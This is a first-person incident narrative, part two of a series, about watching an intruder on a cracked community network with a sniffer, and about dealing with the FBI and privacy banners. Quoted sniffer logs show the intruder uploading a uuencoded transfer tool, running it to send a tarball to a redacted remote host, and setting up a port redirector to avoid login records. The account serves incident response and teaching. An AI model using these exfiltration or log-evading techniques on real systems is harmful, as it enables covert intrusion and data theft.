Watching and Waiting
This is the second part of the story of a community network that was
cracked and what was done to recover from it. The first
part Cracked! Part1:
Denial and truth details the report that leads to the discovery
that the community network was indeed cracked and some of the initial
reactions. This article talks about how they learned more about the cracker
and what they did next.
We were still very concerned that if the cracker realized that we were
on to him he would just trash the system to cover up his tracks. We
did not feel that we had any way to be sure that we could get all of
the backdoors that he could have installed due to length of time that
he had been on the system. But at the same time we needed to learn
more about what he was doing and were he was coming from. We also
hoped that we could gather clues about how he had gotten in. So we
decided to run a sniffer to watch what he was doing.
I had a Linux box that was on the same network as the community network
machines but was not part of the community network. It had not been
up for very long, had most of it's services turned off and had never had
more than myself and a few friends log into it. From this I gambled
that it probably had not been cracked.
On this Linux box I set up a sniffer to watch for traffic going to the ISP
and some of the sites we had suspected he was coming from. We thought
that by watching him to see were he was coming from and what he was
doing that we could get some idea of who he was, what his motivations
were and most important what he was doing. We also thought that we
could use this to find out what kind of skills he had. Was he a
script kiddie, or a super cracker like it was claimed?
For the sniffer I used sniffit as that was a sniffer that I was
most familiar with. I configured it to capture only packets coming to and
from sites that we suspected him to be coming from and from the ISP. I
could not just turn on a sniffer and let it record all of the packets
coming across the wire as there would have been so much traffic
recorded that it would not have helped me figure out what the cracker
was doing. He would have been hidden in the noise and it would be very
difficult if not impossible to see what traffic was his.
I started learning some things about him right from the start.
The first night the sniffer recorded this exchange between the cracker and
someone at the ISP:
*i wonder if bob told you something i've asked him about
*well that was a while back (last week, and i've talked to
him about this
a few weeks ago for the first time)
*i dunno he said you might do that but you needed
to think about it or
*well no i'm on someone elses account now... borrowed if you can put
it that way
*and i tried to page bob but he's not answering so i thought i'd page
you and find out whats going on. it's been a while since i asked i
think i should have an answer some time soon well, he seems to me
logged on and not idle at his computer so i thought i'd try to page
*yeah i guess i do
*just a normal user account i guess. maybe also a
static ip address but that's not very important
*i thought we discussed all that with him when we talked, adn he
should have told you
*guess you dont think thats too important
oh, whatever i want to use it for. email, or ftp, or irc, or whatever
else you have here.
*yes i want a dialup as well as a shell (but chances are i wont use
the dialup much if at all).
*yes, thats where i live.
*i can't find a regular job to do any of those things i like to do
with computers, so currently i'm mostly not working :-( that would be
one way to use it, but i'm not much into that. don't even know what is
satellite codes. that's why i said probably i won't use the dialup
much. i just want to have the option to use it if ever i need
to. well, i'm a programmer, i can program pretty much anything
(although i prefer to code things that dont require a user interface,
such as device drivers, etc).
*also i could of course administrate unix systems if that counts as
*yes, i've done that once
*i'm supposed to know a lot about unix secureity anyway
The ISP owner had told me that the cracker claimed to be from a third
world country and wanted an legitimate account on their system. He
had also hinted that he might want a job in the US. So this
conversation seemed to back that up.
Not that this proved he was from a third world country or anything
like that, it is as easy to say you are from one place as another. I
even thought that he was more likely to be from some other place than
the one he claimed.
Once he was finished with this conversation he uploaded some sort of
file transfer program through his telnet connection. (I have replaced
the hostname to protect the innocent)
$ cat >f
begin 750 f.gz*M'XL("C;P"56'UL4]<5O[9?@@L!'`
$ uudecode f
$ gzip -df f.gz
$ f include.tgz hostname
$ rm f include.tgz
Examining this program later I found that it used UDP to connect to
a server daemon to transfer the files to a remote host.
It was used in a manner similar to how rcp or scp would work, but
seemed to be a custom program. This still did not convince us that he
was more than a script kiddie. He could have gotten the code from
someone and just be using it.
Later that evening he connects to the ISP and starts talking to what looks
like one of the system admins from the ISP about his Linux Kernel module
that hides files and directories:
*which things were you impressed with
*hehe.... not if i can help it...
*but some things like that were recently published in the phrack
*of course that stuff isn't as good as mine :-)
*not really, its just that i don't have a particular reason to make
them freely available... i don't see how that would do me any good,
but i can see rather the opposite
*as to why i code, well, it's not as much fun as it used to... i've
been doing that for a very long time well, concerning this particular
tool with the hidden directories, it's far from being entirely
invisible. so if everyone knew how it worked people could find i
.. and i'd rather them not to , since i'm still using it yep
*but if its loaded through /etc/init it's not that difficult to find it
A few months before this Bugtraq and Phrack had released code for a
Linux Kernel module that did about the same things that he said his
did. So again I was pretty skeptical about these claims. It is easy
to say that you are an elite cracker and much harder to be one. As we
learned it can also be hard to spot one.
As I read the sniffer logs I went and tried to connect the logs to
logins on the community network machines. To my surprise I found that
even through the sniffer was recording connections from our machines
there were not corresponding logins recorded in the logs. My first
thought was that he was "cleaning" the login logs on our machines.
But on closer examination the sniffer logs recorded something
interesting on a strange port.
He was running a process on our boxes that redirected his connections
without requiring him to log in at all. This software listened on
a high port and allowed him to set the port to be redirected
dynamically. The above
example configured his software to redirect any connection to port 2323
on our machine to port 23 (The telnet port) on the ISP's machine.
set 2323 23 hostname
By using the port redirector he would show up as coming from our
system while still not showing anything in our logs.
Non of this proved that the cracker was more than a script kiddie but
I was starting to get a little nagging doubt that he might be more
than we were giving him credit for. That he might be the highly skilled
cracker and programmer that we would later learn that he was.
About this time I got the return phone call from the FBI Computer
Crime Squad agent that was working on the ISP's case. He asked me some
general questions about our situation. What machines had been
cracked, where we saw the connections coming from etc.
Talking to him
I felt better because he actually seemed to know something about computers, the
Internet and Unix to some extent. We had some past dealings with the local FBI
office investigating a child pornography case and they had not known
anything about computers or the Internet at all. When the local agent
had talked to us about online he was talking about BBS systems.
The FBI Computer Crime Squad agent was very interested in what we said
in our login
banner or message of the day. He wanted to know what kind of notice
we gave about use of our system. He informed me that as the
operators of the system we had the legal right to watch the system and
sniff the network but that it
was not admissible into court once we reported the crime.
He sent me via my work email account a selection of possible warning
banners that we could show people when they logged into our machines.
I forwarded the request from the FBI and the example banners to our
executive director and he in turn
talked to our Board of Directors. They had a cow. A big fat cow. We had always
tried to protect our users privacy and this seemed to them to be the
complete opposite of that. They came up with a very watered down
statement that still could not get complete agreement to from all the
Later after the system had been trashed by the cracker and we were all
working to recover what we could, we put up the following. Word for
word from the example the FBI sent us.
This computer system is for authorized users only. Individuals using
this system without authority or in excess of their authority are
subject to having all their activities on this system monitored and
recorded or examined by any authorized person, including law
enforcement, as system personnel deem appropriate. In the course of
monitoring individuals improperly using the system or in the course of
system maintenance, the activities of authorized users may also be
monitored and recorded. Any material so recorded may be disclosed as
appropriate. Anyone using this system consents to these terms.
This time there was a unanimous decision by the board to put it up
even though it trampled to death the right to privacy that they had
held so dear just a few weeks earlier.
Interesting how reality can overwhelm conviction. I still have mixed
emotions about this sort of thing. I believe in the right to privacy,
and yet I was willing to sniff the network. It is a difficult subject
to decide upon. It does not always have a clear cut right and wrong.
I am sure that
there is a point that you should not go beyond and yet there are some bad bad
people out there that will tear down what you have worked to build.
I think you must balance your requirements to protect your system
with the privacy that your users should have. There are no easy
answers to this problem.
So I watched and waited for the cracker to show his hand, to use back
doors, to connect to more machines. I waited for the FBI Computer
Crime Squad to call and tell me that they had arrested the cracker. I
watched for more information that would allow me to plan a way out of
the mess we had found ourselves in.
Here is the question that continues to make me wonder, when I was
watching the cracker was someone watching me?